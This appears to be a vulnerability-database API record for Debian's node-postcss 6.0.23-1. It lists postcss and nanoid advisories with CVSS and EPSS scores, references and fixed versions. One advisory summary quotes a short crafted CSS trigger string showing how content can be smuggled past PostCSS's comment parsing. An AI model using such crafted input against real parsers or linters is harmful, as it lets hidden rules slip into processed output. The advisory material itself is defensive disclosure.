Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:deb/debian/node-postcss@6.0.23-1
Typedeb
Namespacedebian
Namenode-postcss
Version6.0.23-1
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version8.4.20+~cs8.0.23-1+deb12u1
Latest_non_vulnerable_version8.4.20+~cs8.0.23-1+deb12u1
Affected_by_vulnerabilities
0
url VCID-7cky-3c29-zyar
vulnerability_id VCID-7cky-3c29-zyar
summary 
Exposure of Sensitive Information to an Unauthorized Actor in nanoid
The package nanoid from 3.0.0, before 3.1.31, are vulnerable to Information Exposure via the valueOf() function which allows to reproduce the last id generated.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23566.json
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23566.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-23566
reference_id
reference_type
scores
0
value 0.00027
scoring_system epss
scoring_elements 0.07618
published_at 2026-04-24T12:55:00Z
1
value 0.00027
scoring_system epss
scoring_elements 0.0767
published_at 2026-04-21T12:55:00Z
2
value 0.00027
scoring_system epss
scoring_elements 0.0753
published_at 2026-04-18T12:55:00Z
3
value 0.00027
scoring_system epss
scoring_elements 0.07541
published_at 2026-04-16T12:55:00Z
4
value 0.00027
scoring_system epss
scoring_elements 0.07616
published_at 2026-04-13T12:55:00Z
5
value 0.00027
scoring_system epss
scoring_elements 0.0763
published_at 2026-04-12T12:55:00Z
6
value 0.00027
scoring_system epss
scoring_elements 0.07644
published_at 2026-04-11T12:55:00Z
7
value 0.00027
scoring_system epss
scoring_elements 0.07627
published_at 2026-04-08T12:55:00Z
8
value 0.00027
scoring_system epss
scoring_elements 0.07568
published_at 2026-04-07T12:55:00Z
9
value 0.00027
scoring_system epss
scoring_elements 0.07593
published_at 2026-04-04T12:55:00Z
10
value 0.00027
scoring_system epss
scoring_elements 0.07551
published_at 2026-04-02T12:55:00Z
11
value 0.00027
scoring_system epss
scoring_elements 0.07436
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-23566
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23566
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23566
3
reference_url https://gist.github.com/artalar/bc6d1eb9a3477d15d2772e876169a444
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://gist.github.com/artalar/bc6d1eb9a3477d15d2772e876169a444
4
reference_url https://github.com/ai/nanoid
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ai/nanoid
5
reference_url https://github.com/ai/nanoid/commit/2b7bd9332bc49b6330c7ddb08e5c661833db2575
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ai/nanoid/commit/2b7bd9332bc49b6330c7ddb08e5c661833db2575
6
reference_url https://github.com/ai/nanoid/pull/328
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ai/nanoid/pull/328
7
reference_url https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html
8
reference_url https://lists.debian.org/debian-lts-announce/2025/01/msg00006.html
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2025/01/msg00006.html
9
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2332550
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2332550
10
reference_url https://snyk.io/vuln/SNYK-JS-NANOID-2332193
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JS-NANOID-2332193
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2050853
reference_id 2050853
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2050853
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-23566
reference_id CVE-2021-23566
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-23566
13
reference_url https://github.com/advisories/GHSA-qrpm-p2h7-hrv2
reference_id GHSA-qrpm-p2h7-hrv2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qrpm-p2h7-hrv2
14
reference_url https://access.redhat.com/errata/RHSA-2022:5069
reference_id RHSA-2022:5069
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:5069
15
reference_url https://access.redhat.com/errata/RHSA-2022:6156
reference_id RHSA-2022:6156
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:6156
fixed_packages
0
url pkg:deb/debian/node-postcss@8.4.20%2B~cs8.0.23-1%2Bdeb12u1
purl pkg:deb/debian/node-postcss@8.4.20%2B~cs8.0.23-1%2Bdeb12u1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.4.20%252B~cs8.0.23-1%252Bdeb12u1
aliases CVE-2021-23566, GHSA-qrpm-p2h7-hrv2
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7cky-3c29-zyar
1
url VCID-9w43-n9cx-k7ab
vulnerability_id VCID-9w43-n9cx-k7ab
summary 
Regular Expression Denial of Service in postcss
The npm package `postcss` from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23368.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23368.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-23368
reference_id
reference_type
scores
0
value 0.00315
scoring_system epss
scoring_elements 0.54603
published_at 2026-04-24T12:55:00Z
1
value 0.00315
scoring_system epss
scoring_elements 0.54653
published_at 2026-04-11T12:55:00Z
2
value 0.00315
scoring_system epss
scoring_elements 0.54632
published_at 2026-04-21T12:55:00Z
3
value 0.00315
scoring_system epss
scoring_elements 0.54654
published_at 2026-04-18T12:55:00Z
4
value 0.00315
scoring_system epss
scoring_elements 0.54652
published_at 2026-04-16T12:55:00Z
5
value 0.00315
scoring_system epss
scoring_elements 0.54614
published_at 2026-04-13T12:55:00Z
6
value 0.00315
scoring_system epss
scoring_elements 0.54635
published_at 2026-04-12T12:55:00Z
7
value 0.00315
scoring_system epss
scoring_elements 0.54531
published_at 2026-04-01T12:55:00Z
8
value 0.00315
scoring_system epss
scoring_elements 0.54601
published_at 2026-04-02T12:55:00Z
9
value 0.00315
scoring_system epss
scoring_elements 0.54625
published_at 2026-04-04T12:55:00Z
10
value 0.00315
scoring_system epss
scoring_elements 0.54593
published_at 2026-04-07T12:55:00Z
11
value 0.00315
scoring_system epss
scoring_elements 0.54645
published_at 2026-04-08T12:55:00Z
12
value 0.00315
scoring_system epss
scoring_elements 0.5464
published_at 2026-04-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-23368
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23368
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23368
3
reference_url https://github.com/postcss/postcss/commit/54cbf3c4847eb0fb1501b9d2337465439e849734
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/postcss/postcss/commit/54cbf3c4847eb0fb1501b9d2337465439e849734
4
reference_url https://github.com/postcss/postcss/commit/8682b1e4e328432ba692bed52326e84439cec9e4
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/postcss/postcss/commit/8682b1e4e328432ba692bed52326e84439cec9e4
5
reference_url https://github.com/postcss/postcss/commit/b6f3e4d5a8d7504d553267f80384373af3a3dec5
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/postcss/postcss/commit/b6f3e4d5a8d7504d553267f80384373af3a3dec5
6
reference_url https://lists.apache.org/thread.html/r00158f5d770d75d0655c5eef1bdbc6150531606c8f8bcb778f0627be@%3Cdev.myfaces.apache.org%3E
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r00158f5d770d75d0655c5eef1bdbc6150531606c8f8bcb778f0627be@%3Cdev.myfaces.apache.org%3E
7
reference_url https://lists.apache.org/thread.html/r16e295b4f02d81b79981237d602cb0b9e59709bafaa73ac98be7cef1@%3Cdev.myfaces.apache.org%3E
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r16e295b4f02d81b79981237d602cb0b9e59709bafaa73ac98be7cef1@%3Cdev.myfaces.apache.org%3E
8
reference_url https://lists.apache.org/thread.html/r49afb49b38748897211b1f89c3a64dc27f9049474322b05715695aab@%3Cdev.myfaces.apache.org%3E
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r49afb49b38748897211b1f89c3a64dc27f9049474322b05715695aab@%3Cdev.myfaces.apache.org%3E
9
reference_url https://lists.apache.org/thread.html/r5acd89f3827ad9a9cad6d24ed93e377f7114867cd98cfba616c6e013@%3Ccommits.myfaces.apache.org%3E
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r5acd89f3827ad9a9cad6d24ed93e377f7114867cd98cfba616c6e013@%3Ccommits.myfaces.apache.org%3E
10
reference_url https://lists.apache.org/thread.html/r8def971a66cf3e375178fbee752e1b04a812a047cc478ad292007e33@%3Cdev.myfaces.apache.org%3E
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r8def971a66cf3e375178fbee752e1b04a812a047cc478ad292007e33@%3Cdev.myfaces.apache.org%3E
11
reference_url https://lists.apache.org/thread.html/rad5af2044afb51668b1008b389ac815a28ecea9eb75ae2cab5a00ebb@%3Ccommits.myfaces.apache.org%3E
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rad5af2044afb51668b1008b389ac815a28ecea9eb75ae2cab5a00ebb@%3Ccommits.myfaces.apache.org%3E
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-23368
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-23368
13
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244795
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244795
14
reference_url https://snyk.io/vuln/SNYK-JS-POSTCSS-1090595
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JS-POSTCSS-1090595
15
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1948763
reference_id 1948763
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1948763
16
reference_url https://github.com/advisories/GHSA-hwj9-h5mp-3pm3
reference_id GHSA-hwj9-h5mp-3pm3
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hwj9-h5mp-3pm3
17
reference_url https://access.redhat.com/errata/RHSA-2021:2438
reference_id RHSA-2021:2438
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:2438
18
reference_url https://access.redhat.com/errata/RHSA-2021:3917
reference_id RHSA-2021:3917
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3917
fixed_packages
0
url pkg:deb/debian/node-postcss@8.2.1%2B~cs5.3.23-8
purl pkg:deb/debian/node-postcss@8.2.1%2B~cs5.3.23-8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7cky-3c29-zyar
1
vulnerability VCID-f8u5-8mj5-7yc6
2
vulnerability VCID-s6f3-3mxh-ekfr
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.2.1%252B~cs5.3.23-8
aliases CVE-2021-23368, GHSA-hwj9-h5mp-3pm3
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9w43-n9cx-k7ab
2
url VCID-f8u5-8mj5-7yc6
vulnerability_id VCID-f8u5-8mj5-7yc6
summary 
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be `\r` discrepancies, as demonstrated by `@font-face{ font:(\r/*);}` in a rule.

This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-44270.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-44270.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-44270
reference_id
reference_type
scores
0
value 0.00197
scoring_system epss
scoring_elements 0.41638
published_at 2026-04-21T12:55:00Z
1
value 0.00197
scoring_system epss
scoring_elements 0.41713
published_at 2026-04-18T12:55:00Z
2
value 0.00197
scoring_system epss
scoring_elements 0.41691
published_at 2026-04-13T12:55:00Z
3
value 0.00197
scoring_system epss
scoring_elements 0.41706
published_at 2026-04-12T12:55:00Z
4
value 0.00197
scoring_system epss
scoring_elements 0.41739
published_at 2026-04-16T12:55:00Z
5
value 0.00197
scoring_system epss
scoring_elements 0.41716
published_at 2026-04-09T12:55:00Z
6
value 0.00197
scoring_system epss
scoring_elements 0.41707
published_at 2026-04-08T12:55:00Z
7
value 0.00197
scoring_system epss
scoring_elements 0.41657
published_at 2026-04-07T12:55:00Z
8
value 0.00197
scoring_system epss
scoring_elements 0.41729
published_at 2026-04-04T12:55:00Z
9
value 0.00197
scoring_system epss
scoring_elements 0.41701
published_at 2026-04-02T12:55:00Z
10
value 0.00219
scoring_system epss
scoring_elements 0.44445
published_at 2026-04-24T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-44270
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44270
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44270
3
reference_url https://github.com/github/advisory-database/issues/2820
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-23T16:38:23Z/
url https://github.com/github/advisory-database/issues/2820
4
reference_url https://github.com/postcss/postcss
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/postcss/postcss
5
reference_url https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-23T16:38:23Z/
url https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25
6
reference_url https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-23T16:38:23Z/
url https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5
7
reference_url https://github.com/postcss/postcss/releases/tag/8.4.31
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-23T16:38:23Z/
url https://github.com/postcss/postcss/releases/tag/8.4.31
8
reference_url https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html
9
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1053282
reference_id 1053282
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1053282
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2326998
reference_id 2326998
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2326998
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-44270
reference_id CVE-2023-44270
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-44270
12
reference_url https://github.com/advisories/GHSA-7fh5-64p2-3v2j
reference_id GHSA-7fh5-64p2-3v2j
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7fh5-64p2-3v2j
13
reference_url https://access.redhat.com/errata/RHSA-2024:10517
reference_id RHSA-2024:10517
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:10517
14
reference_url https://access.redhat.com/errata/RHSA-2024:10908
reference_id RHSA-2024:10908
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:10908
15
reference_url https://access.redhat.com/errata/RHSA-2025:0654
reference_id RHSA-2025:0654
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0654
16
reference_url https://access.redhat.com/errata/RHSA-2025:0892
reference_id RHSA-2025:0892
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0892
17
reference_url https://access.redhat.com/errata/RHSA-2025:1824
reference_id RHSA-2025:1824
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1824
18
reference_url https://access.redhat.com/errata/RHSA-2025:1829
reference_id RHSA-2025:1829
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1829
19
reference_url https://access.redhat.com/errata/RHSA-2025:1865
reference_id RHSA-2025:1865
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1865
20
reference_url https://access.redhat.com/errata/RHSA-2025:1866
reference_id RHSA-2025:1866
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1866
21
reference_url https://access.redhat.com/errata/RHSA-2025:2652
reference_id RHSA-2025:2652
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:2652
22
reference_url https://access.redhat.com/errata/RHSA-2025:3069
reference_id RHSA-2025:3069
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:3069
fixed_packages
0
url pkg:deb/debian/node-postcss@8.4.20%2B~cs8.0.23-1%2Bdeb12u1
purl pkg:deb/debian/node-postcss@8.4.20%2B~cs8.0.23-1%2Bdeb12u1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.4.20%252B~cs8.0.23-1%252Bdeb12u1
aliases CVE-2023-44270, GHSA-7fh5-64p2-3v2j
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-f8u5-8mj5-7yc6
3
url VCID-s6f3-3mxh-ekfr
vulnerability_id VCID-s6f3-3mxh-ekfr
summary 
Predictable results in nanoid generation when given non-integer values
When nanoid is called with a fractional value, there were a number of undesirable effects:

1. in browser and non-secure, the code infinite loops on while (size--)
2. in node, the value of poolOffset becomes fractional, causing calls to nanoid to return zeroes until the pool is next filled
3. if the first call in node is a fractional argument, the initial buffer allocation fails with an error

Version 3.3.8 and 5.0.9 are fixed.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-55565.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-55565.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-55565
reference_id
reference_type
scores
0
value 0.00107
scoring_system epss
scoring_elements 0.28741
published_at 2026-04-24T12:55:00Z
1
value 0.00107
scoring_system epss
scoring_elements 0.28887
published_at 2026-04-07T12:55:00Z
2
value 0.00107
scoring_system epss
scoring_elements 0.28931
published_at 2026-04-16T12:55:00Z
3
value 0.00107
scoring_system epss
scoring_elements 0.28907
published_at 2026-04-13T12:55:00Z
4
value 0.00107
scoring_system epss
scoring_elements 0.28956
published_at 2026-04-12T12:55:00Z
5
value 0.00107
scoring_system epss
scoring_elements 0.29001
published_at 2026-04-11T12:55:00Z
6
value 0.00107
scoring_system epss
scoring_elements 0.28997
published_at 2026-04-09T12:55:00Z
7
value 0.00107
scoring_system epss
scoring_elements 0.28955
published_at 2026-04-08T12:55:00Z
8
value 0.00107
scoring_system epss
scoring_elements 0.29028
published_at 2026-04-02T12:55:00Z
9
value 0.00107
scoring_system epss
scoring_elements 0.29078
published_at 2026-04-04T12:55:00Z
10
value 0.00107
scoring_system epss
scoring_elements 0.2886
published_at 2026-04-21T12:55:00Z
11
value 0.00107
scoring_system epss
scoring_elements 0.28906
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-55565
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55565
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55565
3
reference_url https://github.com/ai/nanoid
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ai/nanoid
4
reference_url https://github.com/ai/nanoid/compare/3.3.7...3.3.8
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-12T17:19:45Z/
url https://github.com/ai/nanoid/compare/3.3.7...3.3.8
5
reference_url https://github.com/ai/nanoid/pull/510
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-12T17:19:45Z/
url https://github.com/ai/nanoid/pull/510
6
reference_url https://github.com/ai/nanoid/releases/tag/5.0.9
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-12T17:19:45Z/
url https://github.com/ai/nanoid/releases/tag/5.0.9
7
reference_url https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html
8
reference_url https://lists.debian.org/debian-lts-announce/2025/01/msg00006.html
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2025/01/msg00006.html
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-55565
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-55565
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2331063
reference_id 2331063
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2331063
11
reference_url https://github.com/advisories/GHSA-mwcw-c2x4-8c55
reference_id GHSA-mwcw-c2x4-8c55
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-mwcw-c2x4-8c55
12
reference_url https://access.redhat.com/errata/RHSA-2024:10990
reference_id RHSA-2024:10990
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:10990
